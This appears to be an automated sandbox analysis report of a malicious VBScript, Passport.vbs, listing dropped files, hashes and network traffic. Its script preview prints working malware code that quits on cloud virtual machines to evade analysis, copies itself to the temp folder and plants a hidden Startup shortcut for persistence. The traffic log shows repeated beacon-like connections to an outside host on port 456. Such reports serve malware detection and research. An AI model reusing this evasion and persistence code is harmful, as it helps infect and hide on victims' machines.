                                            Encrypted:false
                                            SSDEEP:3:z:z
                                            MD5:D10ACBA4ACACA68B887D94B595E71EC6
                                            SHA1:76439FE70C8DB67DB1ADDA66126EE49C611CEF7D
                                            SHA-256:F85238153CB86E182385EB3CE867FA7FD7D54EDAE68C4F6A4F0DC9DEFDC210FE
                                            SHA-512:27527F86ABBD58CAA34D65944F16E36F9E2E3EB2A0EABFC1FACDC92116DA7029DA3AEA76FF3605D8415F80A656198C2F33C003052D491CAA10F404074A71F344
                                            Malicious:false
                                            Reputation:low
                                            Preview:US.
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):27
                                            Entropy (8bit):3.930270372293455
                                            Encrypted:false
                                            SSDEEP:3:eTFPVXqSn:eTzqSn
                                            MD5:8F57C9D4332780588B5B219A4C857C65
                                            SHA1:EFDEE7EB8E0883DE9C6ADCB086ED4E9466F0499D
                                            SHA-256:88A16D400E75A0AF842001D48932AB1F45F12D3ADABD005843644C6C4443BC95
                                            SHA-512:5B2831D8C8B459CBD4202B79F277B1A48084D3DCF2583EED9569ABBC8A08114EED23203607D24669BB375F94C684F855993D62765020099C508E0E1DB5F2FF38
                                            Malicious:false
                                            Reputation:low
                                            Preview:AS3356 Level 3 Parent, LLC.
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):3
                                            Entropy (8bit):1.584962500721156
                                            Encrypted:false
                                            SSDEEP:3:z:z
                                            MD5:D10ACBA4ACACA68B887D94B595E71EC6
                                            SHA1:76439FE70C8DB67DB1ADDA66126EE49C611CEF7D
                                            SHA-256:F85238153CB86E182385EB3CE867FA7FD7D54EDAE68C4F6A4F0DC9DEFDC210FE
                                            SHA-512:27527F86ABBD58CAA34D65944F16E36F9E2E3EB2A0EABFC1FACDC92116DA7029DA3AEA76FF3605D8415F80A656198C2F33C003052D491CAA10F404074A71F344
                                            Malicious:false
                                            Reputation:low
                                            Preview:US.
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):27
                                            Entropy (8bit):3.930270372293455
                                            Encrypted:false
                                            SSDEEP:3:eTFPVXqSn:eTzqSn
                                            MD5:8F57C9D4332780588B5B219A4C857C65
                                            SHA1:EFDEE7EB8E0883DE9C6ADCB086ED4E9466F0499D
                                            SHA-256:88A16D400E75A0AF842001D48932AB1F45F12D3ADABD005843644C6C4443BC95
                                            SHA-512:5B2831D8C8B459CBD4202B79F277B1A48084D3DCF2583EED9569ABBC8A08114EED23203607D24669BB375F94C684F855993D62765020099C508E0E1DB5F2FF38
                                            Malicious:false
                                            Reputation:low
                                            Preview:AS3356 Level 3 Parent, LLC.
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):5114
                                            Entropy (8bit):5.191564133790374
                                            Encrypted:false
                                            SSDEEP:96:iAOyxY2UJlJro6HFAxzc/vO3YFIbCh0JCrcIjxuS4AAJ/kncsd:l9xY2v6lAWuIFoMDcSo/Li
                                            MD5:A6E8EC20954128687A0534917C8F9DDD
                                            SHA1:C0BAC2548AF02D37B18B16BDDB39CCD9EA5F0CC2
                                            SHA-256:ACA5887474E22B7BE6121C56919953745A7A821311080ACBE8970DA7ED9479B8
                                            SHA-512:FBC0C1D14C95404731957278809F90295C31447FB08DB21B823AA60836E0CB4831967078F21BDB6CA039EAC24022E4628CEA3007F74A34B553CA138B7D03513D
                                            Malicious:true
                                            Reputation:low
                                            Preview:If InStr(LCase(WScript.FullName), "windows") > 0 Then.. Else.. ..WScript.Quit..End If..Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")..Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)....For Each objItem in colItems.. .. If objItem.Model = "Google Compute Engine" Then.. .. WScript.Quit.. End If..Next....Set fso = CreateObject("Scripting.FileSystemObject")..Set shell = CreateObject("WScript.Shell")......tempFolder = shell.ExpandEnvironmentStrings("%TEMP%")....currentScript = WScript.ScriptFullName......tempScript = fso.BuildPath(tempFolder, fso.GetFileName(currentScript))......If Not fso.FileExists(tempScript) Then.. fso.CopyFile currentScript, tempScript..End If....startupFolder = shell.SpecialFolders("Startup")....Set shortcut = shell.CreateShortcut(fso.BuildPath(startupFolder, "pesuti.lnk"))..shortcut.TargetPath = tempScript..shortcut.WorkingDirectory = tempFolder..shortcut.Save....Dim nombreUsuario, mensaje..nombr
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Tue Oct 1 08:00:57 2024, mtime=Tue Oct 1 08:00:57 2024, atime=Tue Oct 1 08:00:56 2024, length=5114, window=hide
                                            Category:dropped
                                            Size (bytes):1130
                                            Entropy (8bit):4.891704371779954
                                            Encrypted:false
                                            SSDEEP:24:8mTC6fDfWD8sV89RB4gKPJ3+anqfA4iUdeNCp3qygm:8mTC6vXRBG3PMeQsyg
                                            MD5:86B97D7E46F42828EB74E83F0B38A905
                                            SHA1:87944F51FFEBD3AE9C31A1685A88408ED0DA330E
                                            SHA-256:A543FF6131F50368354BB14DA2812AC9A2FE90779969CF9F54A2427A283507FD
                                            SHA-512:9E49C029097777ABA06AE9942F9070CE1A8D052CF791C1008BB0A110609A5777E026BF5E2005AED90297A5707DF3F46DD313BAB251F92B42978F6A2EFB4C1DB3
                                            Malicious:true
                                            Reputation:low
                                            Preview:L..................F.... ....D.m.....D.m.....".m..............................:..DG..Yr?.D..U..k0.&...&...... M.....s.3i.....k.m........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlAY.H....B.....................Bdg.A.p.p.D.a.t.a...B.P.1.....AY.H..Local.<......DWSlAY.H....V.......................5.L.o.c.a.l.....N.1.....AY.H..Temp..:......DWSlAY.H....\.....................aR+.T.e.m.p.....f.2.....AY.H .Passport.vbs..J......AY.HAY.H....l.........................P.a.s.s.p.o.r.t...v.b.s.......^...............-.......]............b.V.....C:\Users\user\AppData\Local\Temp\Passport.vbs..).....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.P.a.s.s.p.o.r.t...v.b.s.".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.............:...........|....I.J.H..K..:...`.......X.......210979...........hT..CrF.f4... ..x2=.b...,...W..hT..CrF.f4... ..x2=.b...,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5
                                            File type:ASCII text, with CRLF line terminators
                                            Entropy (8bit):5.191564133790374
                                            TrID:
                                            • Visual Basic Script (13500/0) 100.00%
                                            File name:Passport.vbs
                                            File size:5'114 bytes
                                            MD5:a6e8ec20954128687a0534917c8f9ddd
                                            SHA1:c0bac2548af02d37b18b16bddb39ccd9ea5f0cc2
                                            SHA256:aca5887474e22b7be6121c56919953745a7a821311080acbe8970da7ed9479b8
                                            SHA512:fbc0c1d14c95404731957278809f90295c31447fb08db21b823aa60836e0cb4831967078f21bdb6ca039eac24022e4628cea3007f74a34b553ca138b7d03513d
                                            SSDEEP:96:iAOyxY2UJlJro6HFAxzc/vO3YFIbCh0JCrcIjxuS4AAJ/kncsd:l9xY2v6lAWuIFoMDcSo/Li
                                            TLSH:24B1B62DF406FE6785B0A2717471294DE7E80213E1250C69B8880F9DAF7FEACDAD815D
                                            File Content Preview:If InStr(LCase(WScript.FullName), "windows") > 0 Then.. Else.. ..WScript.Quit..End If..Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")..Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)....For Each objItem in colI
                                            Icon Hash:68d69b8f86ab9a86
                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 1, 2024 11:00:58.270973921 CEST49704443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:58.271004915 CEST4434970434.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:58.271085978 CEST49704443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:58.278230906 CEST49704443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:58.278258085 CEST4434970434.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:58.743803978 CEST4434970434.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:58.743913889 CEST49704443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:58.786659956 CEST49704443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:58.786684990 CEST4434970434.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:58.786937952 CEST4434970434.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:58.787038088 CEST49704443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:58.789117098 CEST49704443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:58.835417032 CEST4434970434.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:58.922924042 CEST4434970434.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:58.922995090 CEST4434970434.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:58.923037052 CEST49704443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:58.923134089 CEST49704443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:58.926304102 CEST49704443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:58.926321030 CEST4434970434.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:58.935046911 CEST49705443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:58.935091019 CEST4434970534.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:58.935183048 CEST49705443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:58.935415983 CEST49705443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:58.935431004 CEST4434970534.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:59.408184052 CEST4434970534.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:59.408330917 CEST49705443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:59.412508011 CEST49705443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:59.412528992 CEST4434970534.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:59.413026094 CEST49705443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:59.413036108 CEST4434970534.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:59.552320004 CEST4434970534.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:59.552438021 CEST4434970534.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:59.552442074 CEST49705443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:59.552484989 CEST49705443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:59.570000887 CEST49705443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:00:59.570029020 CEST4434970534.117.59.81192.168.2.5
                                            Oct 1, 2024 11:00:59.737102032 CEST49706456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:00:59.742085934 CEST45649706185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:00:59.742155075 CEST49706456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:00:59.742336035 CEST49706456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:00:59.747297049 CEST45649706185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:00.574543953 CEST45649706185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:00.574619055 CEST45649706185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:00.574721098 CEST49706456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:00.574791908 CEST49706456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:00.575345993 CEST49706456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:00.581614971 CEST45649706185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:11.542187929 CEST49707443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:11.542232990 CEST4434970734.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:11.542301893 CEST49707443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:11.551682949 CEST49707443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:11.551695108 CEST4434970734.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.014292955 CEST4434970734.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.014475107 CEST49707443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.018949986 CEST49707443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.018960953 CEST4434970734.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.019191027 CEST4434970734.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.019406080 CEST49707443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.021018028 CEST49707443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.063400030 CEST4434970734.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.158674002 CEST4434970734.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.158750057 CEST4434970734.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.158756971 CEST49707443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.158855915 CEST49707443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.161012888 CEST49707443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.161046028 CEST4434970734.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.171195984 CEST49708443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.171248913 CEST4434970834.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.171327114 CEST49708443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.171586037 CEST49708443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.171605110 CEST4434970834.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.633491993 CEST4434970834.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.633640051 CEST49708443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.634207010 CEST49708443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.634222031 CEST4434970834.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.634522915 CEST49708443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.634527922 CEST4434970834.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.775947094 CEST4434970834.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.776058912 CEST49708443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.776118994 CEST4434970834.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.776160955 CEST4434970834.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.776190042 CEST49708443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.776213884 CEST49708443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.776997089 CEST49708443192.168.2.534.117.59.81
                                            Oct 1, 2024 11:01:12.777030945 CEST4434970834.117.59.81192.168.2.5
                                            Oct 1, 2024 11:01:12.791744947 CEST49709456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:12.796900988 CEST45649709185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:12.797008038 CEST49709456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:12.799550056 CEST49709456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:12.804461956 CEST45649709185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:13.608066082 CEST45649709185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:13.608124018 CEST45649709185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:13.608205080 CEST49709456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:13.608205080 CEST49709456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:13.623104095 CEST49709456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:13.627968073 CEST45649709185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:31.701217890 CEST49716456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:31.706289053 CEST45649716185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:31.706376076 CEST49716456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:31.706521034 CEST49716456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:31.711405993 CEST45649716185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:32.517271042 CEST45649716185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:32.517292976 CEST45649716185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:32.517374992 CEST49716456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:32.517656088 CEST49716456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:32.522469997 CEST45649716185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:44.763482094 CEST49717456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:44.768430948 CEST45649717185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:44.768527031 CEST49717456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:44.768646002 CEST49717456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:44.773415089 CEST45649717185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:45.691143036 CEST45649717185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:45.691176891 CEST45649717185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:45.691205978 CEST45649717185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:01:45.691392899 CEST49717456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:45.691392899 CEST49717456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:45.692162037 CEST49717456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:01:45.696969986 CEST45649717185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:03.622544050 CEST49719456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:03.627543926 CEST45649719185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:03.627657890 CEST49719456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:03.627883911 CEST49719456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:03.633559942 CEST45649719185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:04.437534094 CEST45649719185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:04.437594891 CEST45649719185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:04.437700987 CEST49719456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:04.437735081 CEST49719456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:04.437889099 CEST49719456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:04.442652941 CEST45649719185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:16.826176882 CEST49720456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:16.831204891 CEST45649720185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:16.831306934 CEST49720456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:16.831486940 CEST49720456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:16.836322069 CEST45649720185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:17.643846035 CEST45649720185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:17.643929005 CEST49720456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:17.643944025 CEST45649720185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:17.643990993 CEST49720456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:17.644076109 CEST49720456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:17.648802042 CEST45649720185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:35.561028957 CEST49721456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:35.567102909 CEST45649721185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:35.567240000 CEST49721456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:35.567428112 CEST49721456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:35.573936939 CEST45649721185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:36.380686045 CEST45649721185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:36.380745888 CEST45649721185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:36.380763054 CEST49721456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:36.380920887 CEST49721456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:36.381618977 CEST49721456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:36.386430979 CEST45649721185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:48.776189089 CEST49722456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:48.781760931 CEST45649722185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:48.781877041 CEST49722456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:48.783741951 CEST49722456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:48.788671970 CEST45649722185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:49.589329958 CEST45649722185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:49.589529037 CEST49722456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:49.589529991 CEST49722456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:49.589550018 CEST45649722185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:02:49.589643955 CEST49722456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:02:49.594434977 CEST45649722185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:07.514146090 CEST49723456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:07.574443102 CEST45649723185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:07.574671030 CEST49723456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:07.574738026 CEST49723456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:07.580030918 CEST45649723185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:08.380716085 CEST45649723185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:08.380831003 CEST45649723185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:08.380975962 CEST49723456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:08.381169081 CEST49723456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:08.385977030 CEST45649723185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:20.698030949 CEST49724456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:20.703032017 CEST45649724185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:20.703123093 CEST49724456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:20.703315020 CEST49724456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:20.708425999 CEST45649724185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:21.517085075 CEST45649724185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:21.517220020 CEST45649724185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:21.517368078 CEST49724456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:21.517368078 CEST49724456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:21.517411947 CEST49724456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:21.522358894 CEST45649724185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:39.497920036 CEST49725456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:39.502826929 CEST45649725185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:39.502928019 CEST49725456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:39.503453016 CEST49725456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:39.508285999 CEST45649725185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:40.325642109 CEST45649725185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:40.325687885 CEST45649725185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:40.325946093 CEST49725456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:40.327150106 CEST49725456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:40.331983089 CEST45649725185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:52.636723995 CEST49726456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:52.641777992 CEST45649726185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:52.641906977 CEST49726456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:52.642071009 CEST49726456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:52.646881104 CEST45649726185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:53.466299057 CEST45649726185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:53.466437101 CEST49726456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:53.466447115 CEST45649726185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:03:53.466506958 CEST49726456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:53.466584921 CEST49726456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:03:53.471446037 CEST45649726185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:11.450651884 CEST49727456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:11.455746889 CEST45649727185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:11.455832958 CEST49727456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:11.456177950 CEST49727456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:11.461016893 CEST45649727185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:12.275533915 CEST45649727185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:12.275676966 CEST49727456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:12.275696993 CEST45649727185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:12.275763035 CEST49727456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:12.275897026 CEST49727456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:12.280802965 CEST45649727185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:24.588794947 CEST49728456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:24.594669104 CEST45649728185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:24.594789982 CEST49728456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:24.595041990 CEST49728456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:24.600522041 CEST45649728185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:25.421895027 CEST45649728185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:25.421952963 CEST45649728185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:25.422117949 CEST49728456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:25.422266960 CEST49728456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:25.427361012 CEST45649728185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:43.405014992 CEST49729456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:43.409925938 CEST45649729185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:43.410026073 CEST49729456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:43.410209894 CEST49729456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:43.415010929 CEST45649729185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:44.245315075 CEST45649729185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:44.245332956 CEST45649729185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:44.245418072 CEST49729456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:44.245537996 CEST49729456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:44.250390053 CEST45649729185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:56.525222063 CEST49730456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:56.530189991 CEST45649730185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:56.530281067 CEST49730456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:56.530431986 CEST49730456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:56.535326004 CEST45649730185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:57.352982044 CEST45649730185.244.29.74192.168.2.5
                                            Oct 1, 2024 11:04:57.353004932 CEST45649730185.244.29.74192.168.2.5
